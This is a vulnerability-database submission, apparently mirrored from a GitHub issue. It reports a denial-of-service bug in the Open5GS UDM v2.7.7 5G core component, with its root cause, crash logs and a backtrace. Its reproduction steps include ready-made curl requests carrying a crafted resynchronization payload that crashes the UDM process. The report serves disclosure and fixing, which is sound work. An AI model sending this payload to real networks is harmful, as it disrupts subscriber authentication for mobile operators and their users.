提交 #806249: Open5gs UDM v2.7.7 Denial of Service信息

标题	Open5gs UDM v2.7.7 Denial of Service
描述	### Open5GS Release, Revision, or Tag v2.7.7 ### Description UDM aborts when the `nudm-ueau` resynchronization path reaches the downstream `PATCH /nudr-dr/v1/subscription-data/{supi}/authentication-data/authentication-subscription` response handler. The bug is a state mismatch inside `udm_nudr_dr_handle_subscription_authentication()`. The handler uses a single switch for both: - `GET authentication-subscription` - `PATCH authentication-subscription` but only the `GET` branch initializes: ```c udm_ue->auth_type = OpenAPI_auth_type_5G_AKA; ``` The resynchronization flow takes the `PATCH` branch directly, then later does: ```c AuthenticationInfoResult.auth_type = udm_ue->auth_type; ogs_assert(AuthenticationInfoResult.auth_type); ``` For a fresh UE context, `udm_ue->auth_type` is still zero, so the assertion aborts the whole UDM process. ### Root Cause - Entry route: `POST /nudm-ueau/v1/{supi}/security-information/generate-auth-data` - Exact downstream path: `PATCH /nudr-dr/v1/subscription-data/{supi}/authentication-data/authentication-subscription` - Crash site: `../src/udm/nudr-handler.c:258` - Root cause family: parser/business-logic mismatch across method-specific state initialization - Controlling fields: `resynchronizationInfo.rand` and `resynchronizationInfo.auts` ### Steps to Reproduce This live reproduction used the fake h2c NRF/UDR helper at `/home/ubuntu/open5gs_277/.audit_tmp/udm_fake_nrf.js`, with UDM temporarily pointed at `http://10.33.33.1:18081`. 1. Run the fake helper: ```bash node /home/ubuntu/open5gs_277/.audit_tmp/udm_fake_nrf.js ``` 2. Control experiment: send a normal `nudm-ueau` request without `resynchronizationInfo`: ```bash SUPI=imsi-001011234567900 curl --http2-prior-knowledge -sS -i -m 8 \ -X POST "http://10.33.33.10/nudm-ueau/v1/$SUPI/security-information/generate-auth-data" \ -H 'content-type: application/json' \ --data '{"servingNetworkName":"5G:mnc000.mcc000.3gppnetwork.org","ausfInstanceId":"fake-ausf"}' ``` In my live run, UDM returned a normal `200` with an authentication vector and stayed up. 3. Malicious experiment: send the same request on a fresh SUPI, but include a valid zero-state resynchronization payload: ```bash SUPI=imsi-001011234567901 curl --http2-prior-knowledge -sS -i -m 8 \ -X POST "http://10.33.33.10/nudm-ueau/v1/$SUPI/security-information/generate-auth-data" \ -H 'content-type: application/json' \ --data '{"servingNetworkName":"5G:mnc000.mcc000.3gppnetwork.org","ausfInstanceId":"fake-ausf","resynchronizationInfo":{"rand":"00000000000000000000000000000000","auts":"39352148bb6513d313fa20e98dbc"}}' ``` 4. Inspect the crash: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}} {{.RestartCount}}' udm docker logs udm ``` ### Logs ```shell 04/15 14:43:39.722: [sbi] INFO: NF Service [nudm-uecm] (../lib/sbi/context.c:1985) 04/15 14:43:39.722: [sbi] INFO: NF Service [nudm-sdm] (../lib/sbi/context.c:1985) 04/15 14:43:39.723: [sbi] INFO: nghttp2_server() [http://udm.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434) 04/15 14:43:39.723: [app] INFO: UDM initialize...done (../src/udm/app.c:31) 04/15 14:43:39.724: [sbi] ERROR: No NFProfile (../lib/sbi/nnrf-handler.c:44) 04/15 14:43:39.724: [sbi] INFO: [7df13f6a-38d9-41f1-8381-c3b464df73fa] NF registered [Heartbeat:0s] (../lib/sbi/nf-sm.c:341) 04/15 14:43:39.726: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18081] (../lib/sbi/nnrf-handler.c:969) 04/15 14:43:39.726: [sbi] INFO: [sub-1] Subscription created until 2030-01-01T00:00:00Z [duration:117191781000000,validity:117191781.000000,patch:58595890.500000] (../lib/sbi/nnrf-handler.c:888) 04/15 14:43:39.726: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18081] (../lib/sbi/nnrf-handler.c:969) 04/15 14:43:39.726: [sbi] INFO: [sub-1] Subscription created until 2030-01-01T00:00:00Z [duration:117191781000000,validity:117191781.000000,patch:58595890.500000] (../lib/sbi/nnrf-handler.c:888) 04/15 14:43:39.726: [sbi] WARNING: No links (../lib/sbi/nf-sm.c:446) 04/15 14:43:41.713: [sbi] WARNING: Try to discover [nudr-dr] (../lib/sbi/path.c:563) 04/15 14:43:41.716: [sbi] INFO: [fake-udr-control] (NRF-discover) NF registered [type:NULL] (../lib/sbi/nnrf-handler.c:1266) 04/15 14:43:41.716: [sbi] ERROR: [UDR] No instance-level endpoint, client association skipped [id:fake-udr-control] (../lib/sbi/context.c:2056) 04/15 14:43:41.716: [sbi] INFO: [nudr-dr] NFService associated [fake-udr-dr] (../lib/sbi/context.c:2109) 04/15 14:43:41.716: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18082] (../lib/sbi/context.c:2111) 04/15 14:43:41.716: [sbi] INFO: [fake-udr-control] (NF-discover) NF Profile updated [type:UDR validity:30s] (../lib/sbi/nnrf-handler.c:1311) 04/15 14:43:41.716: [udm] INFO: [fake-udr-control] Setup NF Instance [type:UDR] (../src/udm/nnrf-handler.c:89) 04/15 14:43:41.727: [sbi] INFO: [fake-udr-control] Setup NF Instance [type:UDR] (../lib/sbi/path.c:307) 04/15 14:43:41.728: [udm] FATAL: udm_nudr_dr_handle_subscription_authentication: Assertion `AuthenticationInfoResult.auth_type' failed. (../src/udm/nudr-handler.c:258) 04/15 14:43:41.728: [core] FATAL: backtrace() returned 10 addresses (../lib/core/ogs-abort.c:37) open5gs-udmd(+0x198cb) [0x558ffd6238cb] open5gs-udmd(+0xb806) [0x558ffd615806] /usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fc1b735cabc] open5gs-udmd(+0x106fb) [0x558ffd61a6fb] /usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fc1b735cabc] open5gs-udmd(+0x6243) [0x558ffd610243] /usr/local/lib/libogscore.so.2(+0x12b4f) [0x7fc1b734cb4f] /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7fc1b6a41ac3] /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7fc1b6ad2a84] ``` ### Expected behaviour UDM should initialize `auth_type` for the resynchronization (`PATCH`) path or reject the flow cleanly, instead of asserting on uninitialized state. ### Observed Behaviour A single crafted resynchronization request causes UDM to crash with exit code `139` after the downstream UDR `PATCH` response is processed. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
来源	⚠️ https://github.com/open5gs/open5gs/issues/4418
用户	FrankyLin (UID 94345)
提交	2026-04-16 05時37分 (2 月前)
管理	2026-05-04 17時50分 (19 days later)
状态	已接受
VulDB条目	360976 [Open5GS 直到 2.7.7 authentication-subscription Endpoint /src/udm/nudr-handler.c udm_nudr_dr_handle_subscription_authentication 拒绝服务]
积分	20

◂ 上一步一览下一步 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!